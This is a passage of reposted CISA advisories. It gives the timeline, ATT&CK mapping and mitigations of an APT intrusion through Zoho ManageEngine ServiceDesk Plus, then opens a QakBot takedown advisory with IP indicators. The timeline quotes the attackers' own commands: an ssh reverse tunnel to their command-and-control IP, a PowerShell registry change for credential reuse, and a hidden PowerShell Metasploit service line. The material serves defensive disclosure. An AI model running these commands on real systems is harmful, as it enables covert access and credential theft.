2023-01-21 06:50:59	`Mimikatz.exe` downloaded via ConnectWise ScreenConnect.	The legitimate ConnectWise ScreenConnect client was utilized to connect to the ServiceDesk system, download `mimikatz.exe`, and execute malicious payloads to steal credentials [T1219], [T1588.002]. Note: ConnectWise ScreenConnect was observed in multiple locations within the organization’s environment, but the organization confirmed that it was not authorized software. Analysis assessed APT actors downloaded the legitimate software for malicious, illegitimate use prior to the download of `mimikatz.exe`.
2023-01-21 07:34:32	`Bitmap.exe` malware downloaded and designated to connect to C2 IP `179.60.147[.]4`.	`Azure` user account downloaded `bitmap.exe` to the ServiceDesk system to execute an obfuscated, embedded malicious payload from its C2 server [T1027.009]. This malware is identified as a variant of Metasploit (Meterpreter). See MAR-10430311-1.v1 for additional details.
2023-01-21 08:46:23	Mimikatz credential dump files created.	Two files (`c:windowssystem32fuu.txt, c:windowssystem32jojo.txt`) were created as means for Mimikatz to dump/write credentials to disk on the ServiceDesk system [T1003].
2023-01-21 09:25:58	Legitimate files/applications `nmap.exe` and `npcap.exe` downloaded.	`Azure` user account downloaded `nmap.exe` [T1018] and `npcap.exe` [T1040] to continue network and credential information gathering efforts. Though legitimate applications, APT actors used these files for illegitimate, malicious purposes. Note: Adversaries may gather information about the victim’s network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure.
2023-01-21 13:56:14	`ssh2.zip` downloaded by the `Azure` user account.	APT actors downloaded the file `ssh2.zip` via the `Azure` user account, which contained legitimate files that could have been leveraged for malicious purposes. When unzipped, the following files were extracted: `install-sshd.ps1 (script)` `psexec.exe` `sshd.exe` `ssh.exe` `ssh-sk-helper.exe` `libcrypto.dll` Note: CISA analyzed these files and did not identify the files as malicious. However, `ssh.exe` was downloaded to establish persistence on the ServiceDesk system via SSH [T1133] and is detailed in the scheduled task below.
2023-01-21 14:02:45	Ngrok token created, renamed to `ngrok.yml` config file, and Remote Desktop Protocol (RDP) connection established.	Ngrok was used to establish an RDP connection [T1021.001]—another method of maintaining persistence on the ServiceDesk system. In this instance, Ngrok was used to establish a reverse proxy connection to the ServiceDesk system. At the time of analysis, the firewall access control lists (ACLs) allowed all outbound connections. Considering APT actors utilized an outbound proxy, the RDP session was successfully established as the connection was initiated from the ServiceDesk system. Note: RDP is a common feature in operating systems, which allows a user to log into an interactive session with a system desktop graphical user interface on a remote system.
2023-01-21 14:31:01	SSH tools downloaded to establish reverse (remote) communication.	Three identified executables, which provide a command line interface with the compromised system, were observed in the following file system locations: `c:windowssystem32ssh-shellhost.exe` `c:windowssystem32ssh-agent.exe` `c:windowssystem32ssh-add.exe` While the files were not identified as malicious, they were loaded for malicious purposes.
2023-01-21 14:33:11	`license validf` scheduled task created to communicate with malicious IP `104.238.234[.]145`.	`license validf` scheduled task [T1036.004] was created to execute `ssh.exe` on a recurring basis on the ServiceDesk system [T1053.005]: `c:WindowsSystem32ssh.exe -N -f -R 12100 sst@104.238.234.145 -p 443 -o StrictHostKeyChecking=no` Analysis identified `ssh.exe` was used to establish a SSH reverse tunnel to the APT actors’ C2 with dynamic port forwarding [T1572]. This allowed the actors to send traffic from their C2 server into the environment and connect directly to other systems and resources.
2023-01-21 14:51:49	PsExec executed on the ServiceDesk system.	Analysis identified evidence and execution of two files (`PsExec.exe` and `psexec.exe`) on the ServiceDesk system. These files were determined to be benign. APT actors utilized PsExec to create a scheduled task and force-store administrative credentials to the local machine. `psexec.exe -i -s C:WindowsSystem32mmc.exe /s C:WindowsSystem32taskschd.msc` `powershell New-ItemProperty -Path "HKLM:SystemCurrentControlSetControlLsa" -Name "DisableRestrictedAdmin" -Value "0" -PropertyType DWORD -Force` Note: PsExec, a command line utility from Microsoft’s Sysinternals Suite, is known to be used for lateral movement; evidence of lateral movement via PsExec has not been confirmed.
2023-01-21 14:55:02	ProcDump created on the ServiceDesk system.	ProcDump was created within the `c:windowssystem32prc64.exe` directory. This was later identified as a method for enumerating running processes/applications [T1057] and dumping LSASS credentials.
2023-01-24 15:07:18	Apache Log4j exploit attempted against the ServiceDesk system.	APT actors attempted to exploit a known Apache Log4j vulnerability (CVE-2021-44228) in the ServiceDesk system but were unsuccessful. The two IPs and one domain associated with this exploitation attempt are: `80.85.241[.]15` `68.177.56[.]38` `main.cloudfronts[.]net`
2023-01-25 00:17:33	Mimikatz credential dump files created.	One file (`c:ManageEngineServiceDeskbin1.txt`) was created as a method for Mimikatz to dump/write credentials to disk on the ServiceDesk system. Note: This is a different path and time associated with Mimikatz than listed above.
2023-01-29	HTTP-GET requests sent to C2 IP `92.118.39[.]82`.	The server hosting ServiceDesk was observed beaconing/sending HTTP-GET requests to a suspected APT-controlled C2 server, indicating malware was successfully implanted.
2023-02-02 05:51:08	`Resource.aspx` web shell detected.	Using additionally compromised, legitimate administrative credentials, APT actors logged into the Outlook Web Application (OWA) server from the ServiceDesk system. The actors dropped an Active Server Pages Extended (ASPX) web shell in the following file system location, which was designed to execute remote JavaScript code [T1059.007] on the OWA server [T1505.003]: `c:Program FilesMicrosoft Office Web AppsRootWebSiteen-usresource.aspx` Note: The administrative user’s credentials were obtained from the APT actors’ collection (LSASS dump) of credentials from the entire AD domain. This user is separate from the actor-created `Azure` user account. See MAR-10430311-1.v1 for additional details.
2023-02-02 18:45:58	Metasploit service installed.	APT actors installed Metasploit with the following attributes on the organization’s domain controller [T1059.001]: Service Name: `QrrCvbrvnxasKTSb` [T1543.003] Service File Name: `%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4)` [T1564.003] Note: Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform several actions, including discovery of information and execution of code.
2023-02-03 03:27:59	`ConfigLogin.aspx` web shell detected.	APT actors dropped an additional ASPX web shell on a web server in the following file system location: `c:inetpubwwwrotuninetcssfont-awesomecssConfigLogin.aspx` See MAR-10430311-1.v1 for additional details.
2023-02-03 15:12:23	`wkHPd.exe` created to communicate with malicious IP `108.62.118[.]160`.	APT actors created and used a variant of Metasploit (Meterpreter) on the ServiceDesk system, listed as `wkHPd.exe` [T1587.001]. This variant serves as an attack payload that runs an interactive shell and allows a malicious actor to control and execute code on a system. See MAR-10430311-1.v1 for additional details.
2023-02-08 08:56:35, 2023-02-09 20:19:59, 2023-03-04, 2023-03-18	Hypertext Preprocessor (PHP) files uploaded via HTTP-POST request from malicious IP `193.142.146[.]226`.	PHP files were uploaded to the ServiceDesk system via HTTP-POST request. APT actors were observed writing 16 instances of the following files to disk: `[REDACTED]/wp-content/themes/seotheme/db.php` (12 instances) `[REDACTED]/wp-content/plugins/ioptimization/IOptimize.php` (4 instances)
2023-03-06 06:49:40	`Interact.sh`	APT actors executed Domain Name System (DNS) scanning at an additional server (not the ServiceDesk system) and directed callback to the `Interact.sh` domain, which indicated the server was susceptible to a DNS-style attack [T1046]. Destination IP: `103.105.49[.]108`

Post-engagement analysis was extended but analysts were unable to determine additional actions taken by the APT actors, likely due to a lack of sensor coverage and data unavailability. With the data available, it was determined APT actors used the tools listed in Table 2 during their operations.

*Table 2: Observed Tools Used by APT Actors*
Tool	Description	Observation
Mimikatz [2]	A credential dumping tool capable of obtaining plaintext Windows account logins and passwords, along with many other features that make it useful for testing the security of networks.	In addition to using Mimikatz for credential dumping, APT actors dumped the following Windows Registry Hive files: `sam.hiv` [T1003.002] `system.hiv` `security.hiv` These files were dumped to obtain registry information such as users on the system, data used by the operating system [T1012], and installed programs.
Ngrok [3]	Ngrok software operates by running a client process on the machine and creating a private connection tunnel to a designated open port. Ngrok delivers instant ingress to applications in any cloud, private network, or devices with authentication, load balancing, and other critical controls. In recent years, Ngrok has been leveraged maliciously by a variety of threat actors, including use for persistence, lateral movement, and data exfiltration.[4],[5],[6]	Using Ngrok as an external service, APT actors were able to gain access to and utilize the command line on victim systems. Note: CISA and co-sealers have observed this commonly used commercial platform being abused by malicious actors to bypass typical firewall controls. Ngrok’s ability to tunnel RDP and other services securely over internet connections makes it a target for abuse by malicious actors.
ProcDump	A command-line application used to monitor processes and create crash dump files. A crash dump file contains the data loaded in memory at the time the dump was triggered. It is typically used for troubleshooting errors with an application or operating system.	APT actors used ProcDump to conduct reconnaissance and examine spawned processes (applications in use). This tool was also utilized as a utility for dumping credentials from the server hosting ServiceDesk Plus.
Metasploit	Metasploit is an open-source penetration testing software.	APT actors’ specific use of Meterpreter—an attack payload of Metasploit—serves as an interactive shell and allows threat actors to control and execute code on a system.
Interact.sh	An open-source tool for detecting external interactions (communication).[7] This tool is used to detect callbacks from target systems for specified vulnerabilities and commonly used during the reconnaissance stages of adversary activity.	APT actors likely used `Interact.sh` to refrain from using and disclosing their own C2 infrastructure.
anydesk.exe	A remote desktop application that provides platform-independent remote access to personal computers and other devices running the host application. It offers remote control, file transfer, and VPN functionality.	Between early-February and mid-March 2023, `anydesk.exe` was observed on three hosts with different certificate issuers and hashes—none of which were the certified issuer [T1553.002]. APT actors compromised one host and moved laterally to install the executable on the remaining two [T1570]—listed in order of time, as follows: `c:programdataanydesk.exe` `c:Users[REDACTED]DownloadsAnyDesk.exe` `c:Users[REDACTED]DocumentspersonalprogramAnyDesk.exe` Note: Analysts confirmed APT actors’ weaponized use of `anydesk.exe` but were unable to confirm how the software was installed on each host.
quser.exe	A valid program on Windows machines that displays information about user sessions on a Remote Desktop Session Host server [T1049], including the name of the user, name of the session on the remote desktop session host server, session ID, state of the session (active or disconnected), idle time (number of minutes since last keystroke or mouse movement), and date/time the user logged on.[8]	APT actors were observed using this tool as early as March 2023 across four locations with the same name but different hashes (one of which is associated with the Portuguese [Brazil] language pack): `c:ProgramFilesWindowsAppsMicrosoft.LanguageExperiencePackpt-BR_19041.56.186.0_neutral__8wekyb3d8bbweWindowsSystem32pt-BR`
xpack.exe	A custom `.NET` loader that decrypts (AES), loads, and executes accompanying files.	`Xpack.exe` indicators were present on multiple organization hosts, with an unverified user account observed navigating to the sites: `xpack.github[.]io` and `xpack.disqus[.]com`. Additionally, one administrator account and multiple user accounts were observed executing the xpack.exe file from a hidden directory [T1564.001]: `c:USERS[REDACTED].P2POOLPLUGINSORG.ECLIPSE.EMBEDCDT.TEMPLATES.XPACK_6.3.1.202210101738` This malware was predominantly used to execute system commands, drop additional malware and tools, and stage data for exfiltration [T1074]. Note: The data exfiltrated is unknown.

MITRE ATT&CK TACTICS AND TECHNIQUES

See Tables 3-13 for all referenced APT actors’ tactics and techniques for enterprise environments in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.

*Table 3: Resource Development*
Technique Title	ID	Use
Acquire Infrastructure: Botnet	T1583.005	Actors used User-Agent string `Hello World` as an initial step of the Mirai botnet to later download malicious artifacts.
Develop Capabilities: Malware	T1587.001	Actors created and used a variant of Metasploit (Meterpreter) on the ServiceDesk system, listed as `wkHPd.exe`. This malware serves as an attack payload that runs an interactive shell; it allows for control and code execution on a system.
Obtain Capabilities: Exploits	T1588.002	Actors leveraged the legitimate ConnectWise ScreenConnect client to download and utilize the credential dumping tool, `mimikatz.exe`.

*Table 4: Initial Access*
Technique Title	ID	Use
Exploit Public-Facing Application	T1190	Actors exploited a known vulnerability (CVE-2022-47966) in the organization’s web server hosting Zoho ManageEngine ServiceDesk Plus. Actors also attempted to exploit a known Apache Log4j vulnerability (CVE-2021-44228) in the ServiceDesk system but were unsuccessful.

*Table 5: Execution*
Technique Title	ID	Use
Command and Scripting Interpreter: PowerShell	T1059.001	Actors installed and used Metasploit via PowerShell on the organization’s domain controller.
Command and Scripting Interpreter: JavaScript	T1059.007	Actors dropped an ASPX web shell on the OWA server, which was designed to execute remote JavaScript code.

*Table 6: Persistence*
Technique Title	ID	Use
Scheduled Task/Job: Scheduled Task	T1053.005	Actors created the scheduled task `license validf` to execute `ssh.exe` on a recurring basis. This executable was observed as means of establishing persistence on the ServiceDesk system.
Valid Accounts: Local Accounts	T1078.003	Actors compromised and utilized account credentials from a previously hired contractor, of which the contract ended prior to the timeframe of observed activity.
External Remote Services	T1133	`ssh.exe` executes on a recurring basis via a scheduled task on the ServiceDesk system as a method for access via SSH.
Create Account: Local Account	T1136.001	Actors created a local account with administrative permissions on the server hosting ServiceDesk Plus.
Server Software Component: Web Shell	T1505.003	Actors logged into the OWA server from the ServiceDesk system and dropped an ASPX web shell to establish persistent access and execute remote code.
Create or Modify System Process: Windows Service	T1543.003	Actors created a Windows Service via Metasploit.

*Table 7: Privilege Escalation*
Technique Title	ID	Use
Exploitation for Privilege Escalation	T1068	Through exploitation of CVE-2022-47966, actors were given root level access on the web server and created a local user account named `Azure` with administrative privileges.

*Table 8: Defense Evasion*
Technique Title	ID	Use
Indicator Removal: Clear Windows Event Logs	T1070.001	Actors compromised and used disabled, legitimate administrative account credentials to delete logs from several critical servers in the environment.
Masquerading: Masquerade Task or Service	T1036.004	Actors created a scheduled task `license validf`, which appears as legitimate/benign and executes `ssh.exe` on a recurring basis on the ServiceDesk system.
Masquerading: Masquerade File Type	T1036.008	Actors attempted to export three files, which were analyzed and identified as LSASS dump files. These files were renamed with `.zip` and `.gif` extensions to evade detection.
Obfuscated Files or Information: Embedded Payloads	T1027.009	Actors downloaded the malware `bitmap.exe` on the ServiceDesk system to execute an obfuscated, embedded malicious payload from its C2 server.
Subvert Trust Controls: Code Signing	T1553.002	`Anydesk.exe` was observed on three hosts with different certificate issuers and hashes—none of which were the certified issuer.
Hide Artifacts: Hidden Files and Directories	T1564.001	Actors used `xpack.exe` as a method for decrypting, loading, and executing accompanying files from a hidden directory.
Hide Artifacts: Hidden Window	T1564.003	Actors used `-w hidden` to conceal PowerShell windows by setting the WindowStyle parameter to hidden.

*Table 9: Credential Access*
Technique Title	ID	Use
OS Credential Dumping	T1003	Actors created three files as means for Mimikatz to dump/write credentials to disk on the ServiceDesk system.
OS Credential Dumping: LSASS Memory	T1003.001	Actors successfully accessed and dumped credentials stored in the process memory of LSASS for the AD domain, including with the use of ProcDump.
OS Credential Dumping: Security Account Manager	T1003.002	Actors dumped `sam.hiv` to obtain information about users on the system.

*Table 10: Discovery*
Technique Title	ID	Use
System Network Connections Discovery	T1049	`Quser.exe` was executed to acquire information about user sessions on a Remote Desktop Session Host server.
Query Registry	T1012	Actors dumped `system.hiv` and `security.hiv` to obtain information about the data used by the operating system.
Remote System Discovery	T1018	Actors downloaded the legitimate file/application `nmap.exe` via the `Azure` user to conduct network information gathering efforts.
Network Sniffing	T1040	Actors downloaded the legitimate file/application `npcap.exe` via the `Azure` user to conduct credential gathering efforts.
Network Service Discovery	T1046	Actors executed DNS scanning at a web server and directed callback to the `Interact.sh` domain, which indicated the server was susceptible to a DNS-style attack.
Process Discovery	T1057	ProcDump was created within the `c:windowssystem32prc64.exe` directory as a method for enumerating running processes/applications.

*Table 11: Lateral Movement*
Technique Title	ID	Use
Remote Services: Remote Desktop Protocol	T1021.001	Ngrok was used to establish an RDP connection with the ServiceDesk system.
Lateral Tool Transfer	T1570	Actors compromised one host and moved laterally to install `anydesk.exe` on two additional hosts.

*Table 12: Collection*
Technique Title	ID	Use
Data Staged	T1074	Actors executed `xpack.exe` malware from a hidden directory. This malware was predominantly used to execute system commands, drop additional malware and tools, and stage data for exfiltration.

*Table 13: Command and Control*
Technique Title	ID	Use
Application Layer Protocol: Web Protocols	T1071.001	`Hello World` User-Agent string was identified in a HTTP request. Communication occurred between the organization’s web server and an actor-controlled C2 IP address.
Remote Access Software	T1219	Actors leveraged ConnectWise ScreenConnect to connect to the ServiceDesk system. `Anydesk.exe` was run on at least three different hosts in the environment.
Non-Standard Port	T1571	Actors initiated multiple TLS-encrypted sessions on non-standard TCP port `10443`.
Protocol Tunneling	T1572	Actors were observed leveraging SSH to build a reverse tunnel with their C2 server to dynamically forward traffic into the victim organization’s environment. Using Ngrok as an external service, actors were also able to gain access to and use the command line on victim systems via RDP.
Encrypted Channel: Asymmetric Cryptography	T1573.002	Actors initiated multiple TLS-encrypted sessions on TCP port `10443`, indicating successful exchanges of data transfer from the firewall device.

DETECTION METHODS

CISA and co-sealers recommend reviewing Tables 3-13: Identified ATT&CK Techniques for Enterprise in conjunction with the detections in this section to identify similar activity.

Enable logging for new user creation [DS0002], as well as monitor executed commands and arguments for actions that are associated with local account creation, such as net user /add, useradd, and dscl -create [DS0017].
Monitor for newly constructed scheduled tasks by enabling the “Microsoft-Windows-TaskScheduler/Operational” setting within the event logging service. Monitor for changes made to scheduled tasks that may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools [DS0003].
Monitor for API calls that may create or modify Windows services (ex: CreateServiceW()) to repeatedly execute malicious payloads as part of persistence [DS0009].
Monitor executed commands and arguments that may attempt to access credential material stored in the process memory of the LSASS [DS0017].
Monitor for user accounts logged into systems associated with RDP (ex: Windows EID 4624 Logon Type 10) [DS0028].
Monitor for newly-constructed network connections associated with pings/scans that may attempt to collect a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for lateral movement from the current system [DS0029].
Conduct full port scans (1-65535) on internet-facing systems—not just a subset of the ports.

MITIGATIONS

Note: These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.

Manage Vulnerabilities and Configurations [CPG 1.E, CPG 3.A]

CISA and co-sealers identified that exploitation of CVE-2022-47966 granted initial access to the public-facing application, Zoho ManageEngine ServiceDesk Plus. Multiple Zoho ManageEngine on-premises products, such as ServiceDesk Plus through 14003, allow remote code execution due to use of version 1.4.1 of Apache XML Security for Java (also known as xmlsec) from the Apache Santuario project. Due to the xmlsec XSLT features by design in that version, the application is responsible for certain security protections. CISA and co-sealers recommend the following:

Document device configurations [CPG 2.O]. Organizations should maintain updated documentation describing the current configuration details of all critical IT assets (and OT, where applicable), as this facilitates more effective vulnerability and response activities.
Keep all software up to date and patch systems for known exploited vulnerabilities. In places with known exploited vulnerabilities on an endpoint device (e.g., firewall security appliances), conduct investigation prior to patching [CPG 1.E].
Follow a routine patching cycle [M1051] for all operating systems, applications, and software (including all third-party software) to mitigate the potential for exploitation.
Prioritize remediation of vulnerabilities on internet-facing systems, for example, by conducting continuous automated and/or routine vulnerability scans [M1016]. CISA offers a range of services at no cost, including scanning and testing to help organizations reduce exposure to threats via mitigating attack vectors. Specifically, Cyber Hygiene services can help provide a second-set of eyes on organizations’ internet-accessible assets. Organizations can email vulnerability@cisa.dhs.gov with the subject line, “Requesting Cyber Hygiene Services” to get started. For additional guidance on remediating these vulnerabilities, see CISA Insights – Remediate Vulnerabilities for Internet-Accessible Systems.
Deploy security.txt files [CPG 4.C]. All public-facing web domains have a security.txt file that conforms to the recommendations in RFC 9116.[9]

Segment Networks [CPG 2.F]

CISA and co-sealers identified that the organization did not employ proper network segmentation, such as a demilitarized zone (DMZ), during the initial discovery phase of the incident response. A DMZ serves as a perimeter network that protects and adds an extra layer of security to an organization’s internal local area network (LAN) from untrusted traffic.

Employ proper network segmentation, such as a DMZ, and ensure to address the following recommendations. Note: The end goal of a DMZ network is to allow an organization to access untrusted networks, such as the internet, while ensuring its private network or LAN remains secure. Organizations typically store external-facing services and resources, as well as servers for DNS, File Transfer Protocol (FTP), mail, proxy, Voice over Internet Protocol (VoIP), and web servers in the DMZ [CPG 2.K, CPG 2.W].
- Limit internet-facing port exposure for critical resources in the DMZ networks.
- Limit exposed ports to only required IP addresses and avoid placing wildcards in destination port or host entries.
- Ensure unsecured protocols like FTP and HTTP are limited in use and restricted to specific IP ranges.
- If data flows from untrusted zone to trusted zone, ensure it is conducted over a secure protocol like HTTPS with mandatory multi-factor authentication.
Use a firewall or web-application firewall (WAF) and enable logging to prevent/detect potential exploitation attempts [M1050]. Review ingress and egress firewall rules and block all unapproved protocols. Limit risky (but approved) protocols through rules.
- Use WAF to limit exposure to just approved ports, as well as monitor file changes in web directories.
Implement network segmentation to separate network segments based on role and functionality. Proper network segmentation significantly reduces the ability for threat actor lateral movement by controlling traffic flows between—and access to—various subnetworks. See CISA’s Layering Network Security Through Segmentation infographic and the National Security Agency’s (NSA’s) Segment Networks and Deploy Application-Aware Defenses.

Manage Accounts, Permissions, and Workstations

APT actors were able to leverage disabled administrative accounts, as well as clear logs on several critical servers, which prevented the ability to detect follow-on exploitation or data exfiltration. CISA and co-sealers recommend the following:

Use phishing-resistant multi-factor authentication (MFA) [CPG 2.H] (e.g., security tokens) for remote access and access to any sensitive data repositories. Implement phishing-resistant MFA for as many services possible—particularly for webmail and VPNs—for accounts that access critical systems and privileged accounts that manage backups. MFA should also be used for remote logins [M1032]. For additional guidance on secure MFA configurations, visit cisa.gov/MFA and CISA’s Implementing Phishing-Resistant MFA Factsheet.
Employ strong password management alongside other attribute-based information, such as device information, time of access, user history, and geolocation data. Set a password policy to require complex passwords for all users (minimum of 16 characters) and enforce this new requirement as users’ passwords expire [CPG 2.A, CPG 2.B, CPG 2.C].
Implement the principle of least privilege to decrease threat actors’ abilities to access key network resources.
Limit the ability of a local administrator account to log in from a local interactive session [CPG 2.E] (e.g., “Deny access to this computer from the network”) and prevent access via an RDP session.
Establish policy and procedure for the prompt removal of unnecessary (disabled) accounts and groups from the enterprise that are no longer needed, especially privileged accounts. Implement and enforce use of Local Administrator Password Solution (LAPS).
Control and limit local administration, ensuring administrative users do not have access to other systems outside of the local machine and across the domain.
Create a change control process for all privilege escalations and role changes on user accounts. Enable alerts on privilege escalations and role changes, as well as log privileged user changes in the network environment and create alerts for abnormal events.
Create and deploy a secure system baseline image to all workstations. See Microsoft’s guidance on Using Security Baselines in Your Organization.
Implement policies to block workstation-to-workstation RDP connections [CPG 2.V] through a Group Policy Object on Windows, or by a similar mechanism. The RDP service should be disabled if it is unnecessary [M1042].

Secure Remote Access Software

Remote access software provides a proactive and flexible approach for organizations to internally oversee networks, computers, and other devices; however, cyber threat actors increasingly co-opt these tools for access to victim systems. APT actors were observed using legitimate remote access tools—ConnectWise ScreenConnect and AnyDesk—to connect to victim hosts within the organization’s environment and further conduct malicious operations. CISA and co-sealers recommend the following:

Establish a software behavior baseline to detect anomalies in behavior [CPG 2.T, CPG 2.U].
Monitor for unauthorized use of remote access software using endpoint detection tools.

For more information, see CISA’s joint Guide to Securing Remote Access Software on best practices for using remote capabilities and how to detect and defend against malicious actors abusing this software.

Other Best Practice Mitigation Recommendations

Use application allowlists on domain controllers, administrative hosts, and other sensitive systems. Following exploitation of the public-facing application (Zoho ManageEngine ServiceDesk Plus), APT actors were able to download and execute multiple files on the system, which were then utilized to enumerate the network and perform reconnaissance operations.
- Use directory allowlisting rather than attempting to list every possible permutation of applications in a network environment. Safe defaults allow applications to run from PROGRAMFILES, PROGRAMFILES(X86), and SYSTEM32. Disallow all other locations unless an exception is granted and documented. Application directory allowlisting can be enabled through Microsoft Software Restriction Policy or AppLocker and can prevent the execution of unauthorized software.
Audit scheduled tasks and validate all findings via a Group Policy Object (GPO) or endpoint detection and response (EDR) solution.
Follow Microsoft’s Best Practices for Securing Active Directory.
Review NSA’s Network Infrastructure Security Guide.

VALIDATE SECURITY CONTROLS

In addition to applying mitigations, CISA and co-sealers recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA and co-sealers also recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

Select an ATT&CK technique described in this advisory (see Tables 3-13).
Align your security technologies against the technique.
Test your technologies against the technique.
Analyze your detection and prevention technologies performance.
Repeat the process for all security technologies to obtain a set of comprehensive performance data.
Tune your security program, including people, processes, and technologies, based on the data generated by this process.

CISA and co-sealers recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

RESOURCES

DISCLAIMER

The information in this report is being provided “as is” for informational purposes only. CISA, the FBI, and CNMF do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA, the FBI, or CNMF.

REFERENCES

VERSION HISTORY

September 7, 2023: Initial version.

Source de l’article sur us-cert.gov

6 September 2023/by Service comm.

Identification and Disruption of QakBot Infrastructure

Sécurité de l'information et du SI, Sécurité de l’information, Sécurité du système d’information

SUMMARY

The Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) are releasing this joint Cybersecurity Advisory (CSA) to disseminate QakBot infrastructure indicators of compromise (IOCs) identified through FBI investigations as of August 2023. On August 25, FBI and international partners executed a coordinated operation to disrupt QakBot infrastructure worldwide. Disruption operations targeting QakBot infrastructure resulted in the botnet takeover, which severed the connection between victim computers and QakBot command and control (C2) servers. The FBI is working closely with industry partners to share information about the malware to maximize detection, remediation, and prevention measures for network defenders.

CISA and FBI encourage organizations to implement the recommendations in the Mitigations section to reduce the likelihood of QakBot-related activity and promote identification of QakBot-facilitated ransomware and malware infections. Note: The disruption of QakBot infrastructure does not mitigate other previously installed malware or ransomware on victim computers. If potential compromise is detected, administrators should apply the incident response recommendations included in this CSA and report key findings to a local FBI Field Office or CISA at cisa.gov/report.

Download the PDF version of this report:

AA23-242A Identification and Disruption of QakBot Infrastructure (PDF, 570.50 KB )

For a downloadable copy of IOCs, see:

AA23-242A STIX XML (XML, 51.62 KB )

AA23-242A STIX JSON (JSON, 43.12 KB )

TECHNICAL DETAILS

Overview

QakBot—also known as Qbot, Quackbot, Pinkslipbot, and TA570—is responsible for thousands of malware infections globally. QakBot has been the precursor to a significant amount of computer intrusions, to include ransomware and the compromise of user accounts within the Financial Sector. In existence since at least 2008, QakBot feeds into the global cybercriminal supply chain and has deep-rooted connections to the criminal ecosystem. QakBot was originally used as a banking trojan to steal banking credentials for account compromise; in most cases, it was delivered via phishing campaigns containing malicious attachments or links to download the malware, which would reside in memory once on the victim network.

Since its initial inception as a banking trojan, QakBot has evolved into a multi-purpose botnet and malware variant that provides threat actors with a wide range of capabilities, to include performing reconnaissance, engaging in lateral movement, gathering and exfiltrating data, and delivering other malicious payloads, including ransomware, on affected devices. QakBot has maintained persistence in the digital environment because of its modular nature. Access to QakBot-affected (victim) devices via compromised credentials are often sold to further the goals of the threat actor who delivered QakBot.

QakBot and affiliated variants have targeted the United States and other global infrastructures, including the Financial Services, Emergency Services, and Commercial Facilities Sectors, and the Election Infrastructure Subsector. FBI and CISA encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood of QakBot-related infections and promote identification of QakBot-induced ransomware and malware infections. Disruption of the QakBot botnet does not mitigate other previously installed malware or ransomware on victim computers. If a potential compromise is detected, administrators should apply the incident response recommendations included in this CSA and report key findings to CISA and FBI.

QakBot Infrastructure

QakBot’s modular structure allows for various malicious features, including process and web injection, victim network enumeration and credential stealing, and the delivery of follow-on payloads such as Cobalt Strike^[¹^], Brute Ratel, and other malware. QakBot infections are particularly known to precede the deployment of human-operated ransomware, including Conti^[²^], ProLock^[³^], Egregor^[⁴^], REvil^[⁵^], MegaCortex^[⁶^], Black Basta^[⁷^], Royal^[⁸^], and PwndLocker.

Historically, QakBot’s C2 infrastructure relied heavily on using hosting providers for its own infrastructure and malicious activity. These providers lease servers to malicious threat actors, ignore abuse complaints, and do not cooperate with law enforcement. At any given time, thousands of victim computers running Microsoft Windows were infected with QakBot—the botnet was controlled through three tiers of C2 servers.

The first tier of C2 servers includes a subset of thousands of bots selected by QakBot administrators, which are promoted to Tier 1 “supernodes” by downloading an additional software module. These supernodes communicate with the victim computers to relay commands and communications between the upstream C2 servers and the infected computers. As of mid-June 2023, 853 supernodes have been identified in 63 countries, which were active that same month. Supernodes have been observed frequently changing, which assists QakBot in evading detection by network defenders. Each bot has been observed communicating with a set of Tier 1 supernodes to relay communications to the Tier 2 C2 servers, serving as proxies to conceal the main C2 server. The Tier 3 server controls all of the bots.

Indicators of Compromise

FBI has observed the following threat actor tactics, techniques, and procedures (TTPs) in association with OakBot infections:

QakBot sets up persistence via the Registry Run Key as needed. It will delete this key when running and set it back up before computer restart: HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionRun
QakBot will also write its binary back to disk to maintain persistence in the following folder: C:UsersAppDataRoamingMicrosoft
QakBot will write an encrypted registry configuration detailing information about the bot to the following registry key: HKEY_CURRENT_USERSoftwareMicrosoft

In addition, the below IP addresses were assessed to have obtained access to victim computers. Organizations are encouraged to review any connections with these IP addresses, which could potentially indicate a QakBot and/or follow-on malware infection.

Disclaimer: The below IP addresses are assessed to be inactive as of August 29, 2023. Several of these observed IP addresses were first observed as early as 2020, although most date from 2022 or 2023, and have been historically linked to QakBot. FBI and CISA recommend these IP addresses be investigated or vetted by organizations prior to taking action, such as blocking.

*Table 1: IPs Affiliated with QakBot Infections*
IP Address	First Seen
85.14.243[.]111	April 2020
51.38.62[.]181	April 2021
51.38.62[.]182	December 2021
185.4.67[.]6	April 2022
62.141.42[.]36	April 2022
87.117.247[.]41	May 2022
89.163.212[.]111	May 2022
193.29.187[.]57	May 2022
193.201.9[.]93	June 2022
94.198.50[.]147	August 2022
94.198.50[.]210	August 2022
188.127.243[.]130	September 2022
188.127.243[.]133	September 2022
94.198.51[.]202	October 2022
188.127.242[.]119	November 2022
188.127.242[.]178	November 2022
87.117.247[.]41	December 2022
190.2.143[.]38	December 2022
51.161.202[.]232	January 2023
